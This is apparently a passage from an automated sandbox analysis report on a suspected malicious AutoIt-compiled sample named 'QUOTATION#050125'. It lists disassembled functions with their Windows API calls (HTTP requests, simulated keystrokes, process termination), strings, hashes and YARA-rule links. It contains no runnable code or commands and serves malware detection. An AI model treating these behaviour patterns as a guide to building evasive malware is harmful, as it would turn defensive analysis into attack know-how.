                                                                                      • Instruction ID: 69568ff0d45a32e05222bfa901ecd9196ce48dd209dfc150f9f58caf9732078f
                                                                                      • Opcode Fuzzy Hash: 85060f79e860a94ffeb20f21aff0ceca2dc3c32463a8af684bebb5e5c33ab721
                                                                                      • Instruction Fuzzy Hash: 0ED13B31601212CFCB29EF14C899FADF7A5BF05700F14429DE84A6B292DB71AD16CF94
                                                                                      Function 00137DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00137FAD
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00137FC1
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00137FEB
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00138005
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138017
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138060
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001380B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                      • String ID: *.*
                                                                                      • API String ID: 769691225-438819550
                                                                                      • Opcode ID: b9132fcdd8c59bf379050ecccee6bd3df56e83d242589ac147ec79e296d236e5
                                                                                      • Instruction ID: d3cfabf06bea43877c9611cab75aa950619295a45d52e43f727a5da45fda1ec4
                                                                                      • Opcode Fuzzy Hash: b9132fcdd8c59bf379050ecccee6bd3df56e83d242589ac147ec79e296d236e5
                                                                                      • Instruction Fuzzy Hash: A68180B15083459FCB34EF14C484AAEB3E8BB89310F544C6EF889D7291EB74DD498B52
                                                                                      Function 000C5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 000C5C7A
                                                                                        • Part of subcall function 000C5D0A: GetClientRect.USER32(?,?), ref: 000C5D30
                                                                                        • Part of subcall function 000C5D0A: GetWindowRect.USER32(?,?), ref: 000C5D71
                                                                                        • Part of subcall function 000C5D0A: ScreenToClient.USER32(?,?), ref: 000C5D99
                                                                                      • GetDC.USER32 ref: 001046F5
                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00104708
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00104716
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0010472B
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00104733
                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001047C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                      • String ID: U
                                                                                      • API String ID: 4009187628-3372436214
                                                                                      • Opcode ID: 4bd74b04e1735c21dde96b2305793324002a569f7d5696791369e657fce9907e
                                                                                      • Instruction ID: ed9c3d65080ecc21a18956f814609104b622abf71877b90327dd0a5af63a33c7
                                                                                      • Opcode Fuzzy Hash: 4bd74b04e1735c21dde96b2305793324002a569f7d5696791369e657fce9907e
                                                                                      • Instruction Fuzzy Hash: A971DCB5400205EFCF258F64C9C4AAE3BB1FF4A361F14426AEE955A2A6D3719881DF60
                                                                                      Function 0013359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001335E4
                                                                                      • LoadStringW.USER32(00192390,?,00000FFF,?), ref: 0013360A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 2948472770-2391861430
                                                                                      • Opcode ID: 3b7ec523d79f5755990ef4b53d43a9439c3ca72e7a3c343481feeb2755afe3bb
                                                                                      • Instruction ID: 97258a77b6899eb3afcdadafcdfaf3260ebad47467ced5a418a91b5238550aae
                                                                                      • Opcode Fuzzy Hash: 3b7ec523d79f5755990ef4b53d43a9439c3ca72e7a3c343481feeb2755afe3bb
                                                                                      • Instruction Fuzzy Hash: 59518C7190020ABBDF14EBA0DC46EEEBB38EF14310F144129F515721A2EB311B99DFA5
                                                                                      Function 00158B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                        • Part of subcall function 000D912D: GetCursorPos.USER32(?), ref: 000D9141
                                                                                        • Part of subcall function 000D912D: ScreenToClient.USER32(00000000,?), ref: 000D915E
                                                                                        • Part of subcall function 000D912D: GetAsyncKeyState.USER32(00000001), ref: 000D9183
                                                                                        • Part of subcall function 000D912D: GetAsyncKeyState.USER32(00000002), ref: 000D919D
                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00158B6B
                                                                                      • ImageList_EndDrag.COMCTL32 ref: 00158B71
                                                                                      • ReleaseCapture.USER32 ref: 00158B77
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00158C12
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00158C25
                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00158CFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                      • API String ID: 1924731296-2107944366
                                                                                      • Opcode ID: b38d6892421a5d24d0aa3c35f73bc58b57898f942868aa8080e7c22483f45bdb
                                                                                      • Instruction ID: d9b6920e007288b702b2d5205acd091bc07601d3a0e58810d680bf453720384c
                                                                                      • Opcode Fuzzy Hash: b38d6892421a5d24d0aa3c35f73bc58b57898f942868aa8080e7c22483f45bdb
                                                                                      • Instruction Fuzzy Hash: 61516B71104304AFD704DF14D856FAE77E4FB88755F400A2DF9666B2E2DB709988CB62
                                                                                      Function 0013C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0013C272
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0013C29A
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0013C2CA
                                                                                      • GetLastError.KERNEL32 ref: 0013C322
                                                                                      • SetEvent.KERNEL32(?), ref: 0013C336
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0013C341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                      • String ID:
                                                                                      • API String ID: 3113390036-3916222277
                                                                                      • Opcode ID: f79b2d60727768b4f87db2701d24218ccc4097968cbfe0bd547a4f1f18c1a9c9
                                                                                      • Instruction ID: 846196c0a4b16945b09b7f847e2c5e67bb288682ba752bb066b08fb4231971ea
                                                                                      • Opcode Fuzzy Hash: f79b2d60727768b4f87db2701d24218ccc4097968cbfe0bd547a4f1f18c1a9c9
                                                                                      • Instruction Fuzzy Hash: 273167B1600708AFD7219FA4DC88AAB7BFCFB59744F14851EF486A6600DB30ED459BA1
                                                                                      Function 0012989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00103AAF,?,?,Bad directive syntax error,0015CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001298BC
                                                                                      • LoadStringW.USER32(00000000,?,00103AAF,?), ref: 001298C3
                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00129987
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadMessageModuleString
                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                      • API String ID: 2734547477-4153970271
                                                                                      • Opcode ID: 417703a22943a33b040bdbd1bad8fbadbf98e5bd99b999850c2ebfc99ba43ba7
                                                                                      • Instruction ID: b52d75b8fb4f9e480e476e349ce8621b6a51e4b50ab61e978a96b90c76079f78
                                                                                      • Opcode Fuzzy Hash: 417703a22943a33b040bdbd1bad8fbadbf98e5bd99b999850c2ebfc99ba43ba7
                                                                                      • Instruction Fuzzy Hash: 95217A3290031AEBCF15AF90DC4AEEE7739BF18304F04446AF515660A2EB719A68CB60
                                                                                      Function 0012209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetParent.USER32 ref: 001220AB
                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 001220C0
                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0012214D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameParentSend
                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                      • API String ID: 1290815626-3381328864
                                                                                      • Opcode ID: c5d9cda3c2ff0f80a7b91dee083709a3e5694dcf5044125fc412c7498b283899
                                                                                      • Instruction ID: 1b0a663158db1bec42ec69730e131653b2be9d2aff3c0a4a2ba5d1fc86c43f36
                                                                                      • Opcode Fuzzy Hash: c5d9cda3c2ff0f80a7b91dee083709a3e5694dcf5044125fc412c7498b283899
                                                                                      • Instruction Fuzzy Hash: FC11367A688316BEF7053620FC06CEA379DCF15324B200026FB04B80E2FFB169715A18
                                                                                      Function 001550D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00155186
                                                                                      • ShowWindow.USER32(?,00000000), ref: 001551C7
                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 001551CD
                                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 001551D1
                                                                                        • Part of subcall function 00156FBA: DeleteObject.GDI32(00000000), ref: 00156FE6
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0015520D
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0015521A
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0015524D
                                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00155287
                                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00155296
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                      • String ID:
                                                                                      • API String ID: 3210457359-0
                                                                                      • Opcode ID: 1f6a4373d65ae7faadea8daf00e39b5ba6bc2a6ffb65e487bdd970dd852fba1f
                                                                                      • Instruction ID: 2be3f9921045e0ee7d05fa634d7f8eeca7b28cfd13fe4134e44494d41bdaf0e8
                                                                                      • Opcode Fuzzy Hash: 1f6a4373d65ae7faadea8daf00e39b5ba6bc2a6ffb65e487bdd970dd852fba1f
                                                                                      • Instruction Fuzzy Hash: 7F519330A50A08FEEF249F24CC95BD83BA6EB05366F144012FD359E6E1C775A988DB51
                                                                                      Function 000D8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00116890
                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001168A9
                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001168B9
                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001168D1
                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001168F2
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00116901
                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0011691E
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000D8874,00000000,00000000,00000000,000000FF,00000000), ref: 0011692D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 1268354404-0
                                                                                      • Opcode ID: df8e03b2a282dd3cbc9a2629144c1a87732eb658ef22cce2bd744cb5aab1db4c
                                                                                      • Instruction ID: 05a86f7bd44232ac5bda3e038f24a77ce8073ae15134c40ea2819405fedb60e2
                                                                                      • Opcode Fuzzy Hash: df8e03b2a282dd3cbc9a2629144c1a87732eb658ef22cce2bd744cb5aab1db4c
                                                                                      • Instruction Fuzzy Hash: CD51AD70600309EFDB24CF24CC95FAA7BB5FB58365F10452AF9129B2A0DB71E990DB60
                                                                                      Function 0013C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0013C182
                                                                                      • GetLastError.KERNEL32 ref: 0013C195
                                                                                      • SetEvent.KERNEL32(?), ref: 0013C1A9
                                                                                        • Part of subcall function 0013C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0013C272
                                                                                        • Part of subcall function 0013C253: GetLastError.KERNEL32 ref: 0013C322
                                                                                        • Part of subcall function 0013C253: SetEvent.KERNEL32(?), ref: 0013C336
                                                                                        • Part of subcall function 0013C253: InternetCloseHandle.WININET(00000000), ref: 0013C341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 337547030-0
                                                                                      • Opcode ID: e92734f7963f5c3ee264b2a13b4f0023b1ac7c63df8147b1bb7e6666b3d9fde0
                                                                                      • Instruction ID: 91cd3892d9de3af1224d18c596258b5aa7596f2fe483bc1b95dca5771195e1d3
                                                                                      • Opcode Fuzzy Hash: e92734f7963f5c3ee264b2a13b4f0023b1ac7c63df8147b1bb7e6666b3d9fde0
                                                                                      • Instruction Fuzzy Hash: DD315571200705EFDB219FA5DC44A6BBBE9FF28301F04442DF956AAA10D730E854ABE0
                                                                                      Function 001225A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00123A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00123A57
                                                                                        • Part of subcall function 00123A3D: GetCurrentThreadId.KERNEL32 ref: 00123A5E
                                                                                        • Part of subcall function 00123A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001225B3), ref: 00123A65
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 001225BD
                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001225DB
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001225DF
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 001225E9
                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00122601
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00122605
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0012260F
                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00122623
                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00122627
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2014098862-0
                                                                                      • Opcode ID: c063b1bfe7626b3168496e279a520b2bb8aa5c3fcbd659550e495a7a0f875562
                                                                                      • Instruction ID: 5238e2bbca56fa7482d1b51a506223c2399eed1995a5425b821074dc0de9b0de
                                                                                      • Opcode Fuzzy Hash: c063b1bfe7626b3168496e279a520b2bb8aa5c3fcbd659550e495a7a0f875562
                                                                                      • Instruction Fuzzy Hash: F301D831390720FBFB106B689CCAF993F99DB5EB12F100011F314AF1D1CAF114948AA9
                                                                                      Function 00121803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00121449,?,?,00000000), ref: 0012180C
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00121449,?,?,00000000), ref: 00121813
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00121449,?,?,00000000), ref: 00121828
                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00121449,?,?,00000000), ref: 00121830
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00121449,?,?,00000000), ref: 00121833
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00121449,?,?,00000000), ref: 00121843
                                                                                      • GetCurrentProcess.KERNEL32(00121449,00000000,?,00121449,?,?,00000000), ref: 0012184B
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00121449,?,?,00000000), ref: 0012184E
                                                                                      • CreateThread.KERNEL32(00000000,00000000,00121874,00000000,00000000,00000000), ref: 00121868
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1957940570-0
                                                                                      • Opcode ID: 25717365dbf7c1601a03762abf0a4181ec91d930a971a04beac4b5bf82f0651b
                                                                                      • Instruction ID: f4f62a5016e28510474150d323d7d553f30869cbc9a08aca43b4ff09b47cb344
                                                                                      • Opcode Fuzzy Hash: 25717365dbf7c1601a03762abf0a4181ec91d930a971a04beac4b5bf82f0651b
                                                                                      • Instruction Fuzzy Hash: 6101A8B5640708FFE610AFA5DC89F6B3BACEB89B11F004411FA05DB5A1CA709850CB60
                                                                                      Function 0014A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0012D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0012D501
                                                                                        • Part of subcall function 0012D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0012D50F
                                                                                        • Part of subcall function 0012D4DC: CloseHandle.KERNEL32(00000000), ref: 0012D5DC
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0014A16D
                                                                                      • GetLastError.KERNEL32 ref: 0014A180
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0014A1B3
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0014A268
                                                                                      • GetLastError.KERNEL32(00000000), ref: 0014A273
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014A2C4
                                                                                      Strings
                                                                                      Memory Dump Source
